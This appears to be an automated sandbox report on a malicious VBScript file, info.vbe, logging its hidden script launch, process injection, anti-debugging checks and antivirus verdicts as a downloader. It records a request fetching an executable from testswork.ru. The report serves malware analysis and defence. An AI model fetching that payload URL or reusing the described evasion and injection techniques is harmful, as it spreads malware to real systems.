info.vbe

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 26, 2024, 10:11 a.m.	buffer: Microsoft (R) Windows Script Host 버전 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. console_handle: 0x00000007	1	1	0
WriteConsoleW June 26, 2024, 10:11 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\info.vbe(10, 1) msxml3.dll: Access is denied. console_handle: 0x0000000b	1	1	0

Performs some HTTP requests (1 event)

request

GET http://www.testswork.ru/tmp2.exe

Resolves a suspicious Top Level Domain (TLD) (2 events)

domain	testswork.ru				description	Russian Federation domain TLD
domain	www.testswork.ru				description	Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 26, 2024, 10:11 a.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74012000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 26, 2024, 10:11 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74592000 process_handle: 0xffffffff	1	0	0

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 26, 2024, 10:11 a.m.	show_type: 0 filepath_r: CScript parameters: "C:\Users\test22\AppData\Local\Temp\info.vbe" filepath: CScript	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	CScript "C:\Users\test22\AppData\Local\Temp\info.vbe"
parent_process	wscript.exe				martian_process	"C:\Windows\System32\cscript.exe" "C:\Users\test22\AppData\Local\Temp\info.vbe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Process injection	Process 3036 resumed a thread in remote process 2184
Time & API	Arguments	Status	Return	Repeated
NtResumeThread June 26, 2024, 10:11 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2184	1	0	0

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Lionic	Trojan.UKP.Agent.a!c
Cynet	Malicious (score: 99)
CAT-QuickHeal	JS.Downloader.AA
Skyhigh	VBS/Downloader.bk
Baidu	VBS.Trojan-Downloader.Agent.iu
VirIT	Trojan.VBS.Agent.JCY
Symantec	VBS.Downloader.Trojan
ESET-NOD32	VBS/TrojanDownloader.Agent.OBQ
TrendMicro-HouseCall	VBS_COINMINE.D
Kaspersky	Trojan-Downloader.VBS.Agent.bco
NANO-Antivirus	Trojan.Script.MLW.edxafr
MicroWorld-eScan	Trojan.VBS.Agent.WH
Rising	Downloader.Agent/VBS!1.CB16 (CLASSIC)
Emsisoft	Trojan.VBS.Agent.WH (B)
F-Secure	Trojan:VBS/Agent.DWHS
DrWeb	VBS.DownLoader.581
Zillya	Trojan.StartPage.VBS.12
TrendMicro	VBS_COINMINE.D
FireEye	Trojan.VBS.Agent.WH
Sophos	VBS/Dwnldr-MDQ
Ikarus	Trojan-Downloader.HTML.Adodb
Jiangmin	TrojanDownloader.VBS.tm
Google	Detected
Avira	VBS/Agent.bco
Antiy-AVL	Trojan[Downloader]/VBS.Agent
Xcitium	Malware@#3nvl5y3ejddip
Arcabit	Trojan.VBS.Agent.WH
ViRobot	VBE.Downloader.1314
ZoneAlarm	Trojan-Downloader.VBS.Agent.bco
AhnLab-V3	VBS/Agent
Tencent	Vbs.Trojan-Downloader.Der.Ychl
Yandex	Trojan.Etecer.bVl1Gm.57
MAX	malware (ai score=94)
Fortinet	PossibleThreat.P1

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cscript.exe